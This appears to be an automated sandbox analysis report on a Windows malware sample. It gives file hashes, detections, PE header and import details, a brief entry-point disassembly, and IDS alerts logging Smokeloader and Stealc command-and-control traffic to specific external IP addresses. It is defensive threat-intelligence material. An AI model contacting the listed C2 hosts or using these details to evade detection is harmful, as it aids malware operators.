                                                  SHA-512:40E6ECA371F60BB530036C438D069E973038C51FA7D00D9018A744FBC3DD0CDBB8518F13F1E48AF8E99B4FC11289D272100647F0C50BE993103B219DB6EF740C
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:....h... ..............P...............X.......]...P..................V.......e.n.-.C.H.;.e.n.-.G.B...............p..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B.........................................
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):107504
                                                  Entropy (8bit):3.9993515895865035
                                                  Encrypted:false
                                                  SSDEEP:768:zn18VKk6GmgCMqjk0Yc/ImXk1gqNoLlFRjwHGpPhYDR1vINVW1/mOypZr3EPUhyP:zeKkqgi/ImXk2otUh2i4GGnFrFuyK1I3
                                                  MD5:BE391ADF418CA0D54A5B938209E81FC4
                                                  SHA1:65B848557256816107D0DB78ED95A45734B8CE07
                                                  SHA-256:58DD52E1D286E7D6B5442FBEEC92EAC76FD6D82E7DCC9645258B5366642090EA
                                                  SHA-512:DD41D84BE2EBAA4A27C22F666FB296065BF221AB109207A964CA5EB9CE10B809B671831DDDD3F9C31E069804C6E01236D3357354AB94674AF7934E3493553A3D
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:....h... ..............P...............X.......]...P..................V.......e.n.-.C.H.;.e.n.-.G.B...............p..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B.........................................
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):747
                                                  Entropy (8bit):5.176066526559865
                                                  Encrypted:false
                                                  SSDEEP:12:YWgc2TwYH+0FaKFL/mXkH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB893c3Z:Yzc2TwYHFFRxekHt0drc6hE14
                                                  MD5:F91814BC737381DA6CC1082F873A58E3
                                                  SHA1:07DBC9CF2915850FB501DC094EEF2C93F17C831C
                                                  SHA-256:65BE7779DACB4815CA0BA8891E5D2CAD4642497EF9B28285AF5BD975660777FD
                                                  SHA-512:4A165108AC9A261DF257A17E395D227BCFE4ED05A7F78C9C3E485AC75B44883B53570B0281268BAB7488A6D54CA25BD1D31678FAFCC6E9C5A0F3D46A4CBA8E6B
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:{"serviceContext":{"serviceActivityId":"66d55983-2f29-4189-aa48-61371e3c9f77","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"66d55983-2f29-4189-aa48-61371e3c9f77|2024-09-02T06:21:55.6699565Z|fabric_msn|ESU|News_491"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):3639176
                                                  Entropy (8bit):7.398157669285365
                                                  Encrypted:false
                                                  SSDEEP:98304:H+sv/t4BT7/Z/U6NVQFamv1oOgEoYYkTZ9:H+it4x7RcsmFxv+OgEoYvTZ9
                                                  MD5:17D51083CCB2B20074B1DC2CAC5BEA36
                                                  SHA1:0A046864AD4304F63DBDE5AC14D3DC05CFB48D46
                                                  SHA-256:681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
                                                  SHA-512:7DA8A2FD0321231C17FDDF414BF1D5A03D71DBC619F68958FF1D167003F972920F0F3C830B8A25AA715DF4FCC044D88D739B6EAB115A5B0B0A53852A70F4238A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Joe Sandbox View:
                                                  • Filename: mLn7GEEpuS.exe, Detection: malicious, Browse
                                                  • Filename: V6n3oygctH.exe, Detection: malicious, Browse
                                                  • Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
                                                  • Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................H....2......V.......`....@...........................7.......7..........@............................... ...P...v1..........f7..!......Dd..................................................................................CODE....`F.......H.................. ..`DATA....d....`.......L..............@...BSS.....Q............f...................idata... ......."...f..............@....tls.....................................rdata..............................@..P.reloc..Dd.......f..................@..P.rsrc....v1..P...v1.................@..P..............7......f7.............@..P........................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\9A25.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2990472
                                                  Entropy (8bit):6.459856200541649
                                                  Encrypted:false
                                                  SSDEEP:49152:/INqIwJA7BYAzLOhHpB63X4oQaM35DhnSYf7bPZcYsO5+th1:wNqC7BZEHSQz5DhnSy7ujL
                                                  MD5:B826DD92D78EA2526E465A34324EBEEA
                                                  SHA1:BF8A0093ACFD2EB93C102E1A5745FB080575372E
                                                  SHA-256:7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
                                                  SHA-512:1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  Joe Sandbox View:
                                                  • Filename: mLn7GEEpuS.exe, Detection: malicious, Browse
                                                  • Filename: V6n3oygctH.exe, Detection: malicious, Browse
                                                  • Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
                                                  • Filename: h8jGj6Qe78.exe, Detection: malicious, Browse
                                                  • Filename: ACGPhnMVxb.exe, Detection: malicious, Browse
                                                  • Filename: 2eqt27LXwV.exe, Detection: malicious, Browse
                                                  • Filename: uxx8jvvSHl.exe, Detection: malicious, Browse
                                                  • Filename: 1wM0OWBdv5.exe, Detection: malicious, Browse
                                                  • Filename: 1wM0OWBdv5.exe, Detection: malicious, Browse
                                                  • Filename: JZ9FCJzkXL.exe, Detection: malicious, Browse
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):413184
                                                  Entropy (8bit):5.970134337921282
                                                  Encrypted:false
                                                  SSDEEP:6144:k2Lh2Mw6FnhZ+ObiTteTqeN1qRU1WG0S2IcNPk:kSh2JYnhoObK4MUCXi
                                                  MD5:A4BC249DC997DF25A0E709EEE0A0DF87
                                                  SHA1:D4BD3DCC3C5C1BED477F3ECCBF1561B4C4F9180B
                                                  SHA-256:F691D08D4D08A092F52D63EB5A5FCE0CBDEEAA042C18282C73AC5EBB627C25D3
                                                  SHA-512:E4C12400284EA1B11C13B85C19AAF41569C40BE1519ADBB2D388AE1DDBB06CAA7BA08898F42CE0DE19640769418267908C1282C734164B3714B40541C18CCE36
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.:.=.i.=.i.=.i.Kki.=.i.K_i.=.i.K^i.=.i.Efi.=.i.=.i.=.i.KZi.=.i.Koi.=.i.Khi.=.iRich.=.i........PE..L......e............................2L............@..........................p.......Y..........................................P....@..."..........................l................................4..@............................................text.............................. ..`.data....s.......x..................@....rsrc...."...@...$...*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):5.970134337921282
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:oZB7n3wuNk.exe
                                                  File size:413'184 bytes
                                                  MD5:a4bc249dc997df25a0e709eee0a0df87
                                                  SHA1:d4bd3dcc3c5c1bed477f3eccbf1561b4c4f9180b
                                                  SHA256:f691d08d4d08a092f52d63eb5a5fce0cbdeeaa042c18282c73ac5ebb627c25d3
                                                  SHA512:e4c12400284ea1b11c13b85c19aaf41569c40be1519adbb2d388ae1ddbb06caa7ba08898f42ce0de19640769418267908c1282c734164b3714b40541c18cce36
                                                  SSDEEP:6144:k2Lh2Mw6FnhZ+ObiTteTqeN1qRU1WG0S2IcNPk:kSh2JYnhoObK4MUCXi
                                                  TLSH:C094CF126AE8BC25D5612A329D2DC7FC362EBC11AE14375A22D87F3F28703E1F562351
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.:.=.i.=.i.=.i.Kki.=.i.K_i.=.i.K^i.=.i.Efi.=.i.=.i.=.i.KZi.=.i.Koi.=.i.Khi.=.iRich.=.i........PE..L......e...................
                                                  Icon Hash:cd4d3d2e4e054d07
                                                  Entrypoint:0x404c32
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x65BDF7BA [Sat Feb 3 08:22:18 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:3db609d4227cf2765fb47eb54c2d687e
                                                  Instruction
                                                  call 00007F73C917840Ah
                                                  jmp 00007F73C91757FEh
                                                  push 00000008h
                                                  push 0043B090h
                                                  call 00007F73C9177AADh
                                                  mov ecx, dword ptr [ebp+08h]
                                                  test ecx, ecx
                                                  je 00007F73C917599Ch
                                                  cmp dword ptr [ecx], E06D7363h
                                                  jne 00007F73C9175994h
                                                  mov eax, dword ptr [ecx+1Ch]
                                                  test eax, eax
                                                  je 00007F73C917598Dh
                                                  mov eax, dword ptr [eax+04h]
                                                  test eax, eax
                                                  je 00007F73C9175986h
                                                  and dword ptr [ebp-04h], 00000000h
                                                  push eax
                                                  push dword ptr [ecx+18h]
                                                  call 00007F73C917854Fh
                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                  call 00007F73C9177ABCh
                                                  ret
                                                  xor eax, eax
                                                  cmp byte ptr [ebp+0Ch], al
                                                  setne al
                                                  ret
                                                  mov esp, dword ptr [ebp-18h]
                                                  call 00007F73C91774F8h
                                                  int3
                                                  call 00007F73C917654Eh
                                                  xor ecx, ecx
                                                  cmp dword ptr [eax+00000090h], ecx
                                                  setne al
                                                  ret
                                                  sub eax, 000003A4h
                                                  je 00007F73C9175994h
                                                  sub eax, 04h
                                                  je 00007F73C9175989h
                                                  sub eax, 0Dh
                                                  je 00007F73C917597Eh
                                                  dec eax
                                                  je 00007F73C9175975h
                                                  xor eax, eax
                                                  ret
                                                  mov eax, 00000404h
                                                  ret
                                                  mov eax, 00000412h
                                                  ret
                                                  mov eax, 00000804h
                                                  ret
                                                  mov eax, 00000411h
                                                  ret
                                                  mov edi, edi
                                                  push esi
                                                  push edi
                                                  mov esi, eax
                                                  push 00000101h
                                                  xor edi, edi
                                                  lea eax, dword ptr [esi+1Ch]
                                                  push edi
                                                  push eax
                                                  call 00007F73C917886Dh
                                                  xor eax, eax
                                                  movzx ecx, ax
                                                  mov eax, ecx
                                                  mov dword ptr [esi+04h], edi
                                                  mov dword ptr [esi+08h], edi
                                                  mov dword ptr [esi+0Ch], edi
                                                  shl ecx, 00000000h
                                                  Programming Language:
                                                  • [ASM] VS2010 build 30319
                                                  • [ C ] VS2010 build 30319
                                                  • [C++] VS2010 build 30319
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [RES] VS2010 build 30319
                                                  • [LNK] VS2010 build 30319
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3b21c0x50.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e40000x122d0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b26c0x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34080x40.text
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1cc.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x3acca0x3ae00c21eb577dabdfebaf1f9a319e36eb71fFalse0.8554977773354565data7.6644446499082015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .data0x3c0000x1a73040x17800bb0ec0b3d9013f7f2267865380e6ca23False0.01915724734042553data0.2516136039511897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x1e40000x122d00x124007ded111e84f1fd561b878d0e5d6a9631False0.3543851669520548data4.528155850993527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  AFX_DIALOG_LAYOUT0x1f0f480xedata1.5714285714285714
                                                  AFX_DIALOG_LAYOUT0x1f0f580x2data5.0
                                                  RT_CURSOR0x1f0f600x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                  RT_CURSOR0x1f12900x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                  RT_CURSOR0x1f13e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                                                  RT_CURSOR0x1f22900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                                                  RT_CURSOR0x1f2b380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                                                  RT_CURSOR0x1f30d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                  RT_CURSOR0x1f3f780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                  RT_CURSOR0x1f48200x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                  RT_ICON0x1e48300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.46375266524520253
                                                  RT_ICON0x1e48300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.46375266524520253
                                                  RT_ICON0x1e56d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5749097472924187
                                                  RT_ICON0x1e56d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5749097472924187
                                                  RT_ICON0x1e5f800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.636520737327189
                                                  RT_ICON0x1e5f800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.636520737327189
                                                  RT_ICON0x1e66480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6921965317919075
                                                  RT_ICON0x1e66480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6921965317919075
                                                  RT_ICON0x1e6bb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.3573651452282158
                                                  RT_ICON0x1e6bb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.3573651452282158
                                                  RT_ICON0x1e91580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilIndia0.4455909943714822
                                                  RT_ICON0x1e91580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilSri Lanka0.4455909943714822
                                                  RT_ICON0x1ea2000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilIndia0.5176229508196721
                                                  RT_ICON0x1ea2000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilSri Lanka0.5176229508196721
                                                  RT_ICON0x1eab880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.6152482269503546
                                                  RT_ICON0x1eab880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.6152482269503546
                                                  RT_ICON0x1eb0680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3675373134328358
                                                  RT_ICON0x1eb0680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3675373134328358
                                                  RT_ICON0x1ebf100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.453971119133574
                                                  RT_ICON0x1ebf100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.453971119133574
                                                  RT_ICON0x1ec7b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.45794930875576034
                                                  RT_ICON0x1ec7b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.45794930875576034
                                                  RT_ICON0x1ece800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
                                                  RT_ICON0x1ece800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
                                                  RT_ICON0x1ed3e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.26815352697095435
                                                  RT_ICON0x1ed3e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.26815352697095435
                                                  RT_ICON0x1ef9900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.31097560975609756
                                                  RT_ICON0x1ef9900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.31097560975609756
                                                  RT_ICON0x1f0a380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3528368794326241
                                                  RT_ICON0x1f0a380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3528368794326241
                                                  RT_DIALOG0x1f50280x58data0.8977272727272727
                                                  RT_STRING0x1f50800x3b8AmigaOS bitmap font "o", fc_YSize 26880, 22528 elements, 2nd "a", 3rd "v"TamilIndia0.4653361344537815
                                                  RT_STRING0x1f50800x3b8AmigaOS bitmap font "o", fc_YSize 26880, 22528 elements, 2nd "a", 3rd "v"TamilSri Lanka0.4653361344537815
                                                  RT_STRING0x1f54380x536dataTamilIndia0.444527736131934
                                                  RT_STRING0x1f54380x536dataTamilSri Lanka0.444527736131934
                                                  RT_STRING0x1f59700x1f4dataTamilIndia0.518
                                                  RT_STRING0x1f59700x1f4dataTamilSri Lanka0.518
                                                  RT_STRING0x1f5b680x508dataTamilIndia0.4409937888198758
                                                  RT_STRING0x1f5b680x508dataTamilSri Lanka0.4409937888198758
                                                  RT_STRING0x1f60700x260dataTamilIndia0.4934210526315789
                                                  RT_STRING0x1f60700x260dataTamilSri Lanka0.4934210526315789
                                                  RT_ACCELERATOR0x1f0f080x40dataTamilIndia0.875
                                                  RT_ACCELERATOR0x1f0f080x40dataTamilSri Lanka0.875
                                                  RT_GROUP_CURSOR0x1f13c00x22data1.0294117647058822
                                                  RT_GROUP_CURSOR0x1f30a00x30data0.9375
                                                  RT_GROUP_CURSOR0x1f4d880x30data0.9375
                                                  RT_GROUP_ICON0x1eaff00x76dataTamilIndia0.6610169491525424
                                                  RT_GROUP_ICON0x1eaff00x76dataTamilSri Lanka0.6610169491525424
                                                  RT_GROUP_ICON0x1f0ea00x68dataTamilIndia0.7115384615384616
                                                  RT_GROUP_ICON0x1f0ea00x68dataTamilSri Lanka0.7115384615384616
                                                  RT_VERSION0x1f4db80x26cdata0.5451612903225806
                                                  DLLImport
                                                  KERNEL32.dllSetEnvironmentVariableW, CreateJobObjectW, InterlockedCompareExchange, UnlockFile, CreateHardLinkA, GetTickCount, GetNumberFormatA, GetConsoleAliasExesW, SetCommState, GlobalAlloc, LoadLibraryW, LocalShrink, GetCalendarInfoA, CreateEventA, SetVolumeMountPointA, GetSystemWindowsDirectoryA, GetConsoleAliasExesLengthW, SetConsoleCP, GetFileAttributesA, VerifyVersionInfoA, CreateActCtxA, GetThreadPriorityBoost, GetShortPathNameA, GetLogicalDriveStringsA, GetCurrentDirectoryW, SetLastError, GetProcAddress, PeekConsoleInputW, SetDefaultCommConfigW, GetProcessVersion, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingW, GetNumberFormatW, OpenEventA, QueryDosDeviceW, SetConsoleWindowInfo, GlobalWire, GetModuleFileNameA, EnumResourceNamesA, VirtualProtect, EnumDateFormatsW, SetProcessShutdownParameters, SetFileShortNameA, GetDiskFreeSpaceExA, ReadConsoleInputW, GetTempPathA, EnumCalendarInfoExA, LCMapStringW, HeapReAlloc, HeapSize, Sleep, GetStringTypeW, GetCurrentProcess, GetLocaleInfoA, SetEndOfFile, CommConfigDialogA, CreateNamedPipeA, MultiByteToWideChar, GetLastError, HeapFree, HeapAlloc, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapCreate, WriteFile, GetStdHandle, GetModuleFileNameW, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, RaiseException, WideCharToMultiByte
                                                  USER32.dllCharUpperW, GetSysColor, GetMenuStringA, GetCaretPos, LoadMenuW
                                                  GDI32.dllCreateDCW, GetBitmapBits, GetCharWidthFloatA, GetCharWidth32A
                                                  Language of compilation systemCountry where language is spokenMap
                                                  TamilIndia
                                                  TamilSri Lanka
                                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                  2024-09-02T08:20:56.464489+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972980192.168.2.62.185.214.11
                                                  2024-09-02T08:20:56.464489+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814972980192.168.2.62.185.214.11
                                                  2024-09-02T08:20:38.270691+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14971680192.168.2.62.185.214.11
                                                  2024-09-02T08:20:38.270691+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814971680192.168.2.62.185.214.11
                                                  2024-09-02T08:21:12.689150+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974380192.168.2.62.185.214.11
                                                  2024-09-02T08:21:04.584929+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973680192.168.2.62.185.214.11
                                                  2024-09-02T08:20:41.705004+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14971980192.168.2.62.185.214.11
                                                  2024-09-02T08:20:41.705004+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814971980192.168.2.62.185.214.11
                                                  2024-09-02T08:21:09.644123+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974180192.168.2.62.185.214.11
                                                  2024-09-02T08:21:09.644123+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814974180192.168.2.62.185.214.11
                                                  2024-09-02T08:20:51.830169+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972680192.168.2.62.185.214.11
                                                  2024-09-02T08:20:44.470379+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972280192.168.2.62.185.214.11
                                                  2024-09-02T08:20:44.470379+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814972280192.168.2.62.185.214.11
                                                  2024-09-02T08:20:40.547489+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14971880192.168.2.62.185.214.11
                                                  2024-09-02T08:20:40.547489+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814971880192.168.2.62.185.214.11
                                                  2024-09-02T08:21:00.505655+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973380192.168.2.62.185.214.11
                                                  2024-09-02T08:20:46.136287+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14972380192.168.2.62.185.214.11
                                                  2024-09-02T08:21:18.914730+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14974680192.168.2.62.185.214.11
                                                  2024-09-02T08:21:03.300496+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973580192.168.2.62.185.214.11
                                                  2024-09-02T08:21:03.300496+0200TCP2851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1814973580192.168.2.62.185.214.11
                                                  2024-09-02T08:20:39.421290+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14971780192.168.2.62.185.214.11
                                                  2024-09-02T08:21:23.383253+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in14975180192.168.2.691.202.233.158
                                                  2024-09-02T08:20:59.249947+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973180192.168.2.62.185.214.11
                                                  2024-09-02T08:21:23.479496+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14975080192.168.2.62.185.214.11
                                                  2024-09-02T08:21:07.154202+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14973880192.168.2.62.185.214.11
